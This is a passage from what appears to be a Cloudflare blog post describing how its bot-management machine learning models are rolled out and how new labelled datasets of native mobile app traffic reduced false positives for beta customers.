We then begin testing in active mode. We have the ability to roll out a model to different customer plans and sample the model for a percentage of requests or visitors. First we roll out to customers on the free plan, such as customers who enable I’m Under Attack Mode. Once we validate the model for free customers, we roll out to Super Bot Fight Mode customers gradually. We then allow customers who would like to beta test the model onboard and use it. Once our beta customers are happy, the new model is officially released as stable. Existing customers can choose to upgrade to this model, all new customers will get the latest version by default.

How we improved mobile app performance

With our latest model, we set out to use the above training process to specifically improve performance on mobile app traffic. To train our models, we need labeled data: a set of HTTP requests that we've manually annotated as either "bot" or "human" traffic. We gather this labeled data from a variety of sources as we spoke about above, but one area where we've historically struggled is finding good datasets for "human" traffic from mobile applications. Our best sample of “good” traffic was when the client was able to solve a browser challenge or CAPTCHA. Unfortunately, this also limited the variety of good traffic we could have in our dataset since a lot of “good” traffic cannot solve CAPTCHA - like a subset of mobile app traffic. Most CAPTCHA solutions rely on web technologies like HTML + JavaScript and are meant to be executed and rendered via a web browser. Native mobile apps, on the other hand, may not be capable of rendering CAPTCHAs properly, so most native mobile app traffic will never make it into these datasets.

This means that "human" traffic from native mobile applications was typically under-represented in our training data compared to how common it is across the Internet. In turn, this led to our models performing worse on native mobile app traffic compared to browser traffic. In order to rectify this situation, we set out to find better datasets.

We leveraged a variety of techniques to identify subsets of requests that we could confidently label as legitimate native mobile app traffic. We dug through open source code for mobile operating systems as well as popular libraries and frameworks to identify how legitimate mobile app traffic should behave. We also worked with some of our customers to identify domain-specific traffic patterns that could distinguish legitimate mobile app traffic from other types of traffic.

After much testing, feedback, and iteration, we came up with multiple new datasets that we incorporated into our model training process to greatly improve the performance on mobile app traffic.

Improvements in mobile performance

With added data from validated mobile app traffic, our newest model can identify valid user requests originating from mobile app traffic by understanding the unique patterns and signals that we see for this type of traffic. This month, we released our latest machine learning model, trained using our newly identified valid mobile request dataset, to a select group of beta customers. The results have been positive.

In one case, a food delivery company saw false positive rates for Android traffic drop to 0.0%. That may sound impossible, but it’s the result of training on trusted data.

In another case, a major Web3 platform saw similar improvement. Previous models had shown false positives, varying between 28.7% and 40.7% for edge case mobile application traffic. Our newest model has brought this down to nearly 0.0%.

These are just two examples of results we’ve seen broadly, which has led to an increase in adoption of ML among customers protecting mobile apps. If you have a mobile app you haven’t yet protected with Bot Management, head to the Cloudflare dashboard today and see what the new model shows for your own traffic. We provide free bot analytics to all customers, so you can see what bots are doing on your mobile apps today, and turn on Bot Management if you see something you’d like to block. If your mobile app is driven by APIs, as most are, you might also want to take a look at our new API Gateway.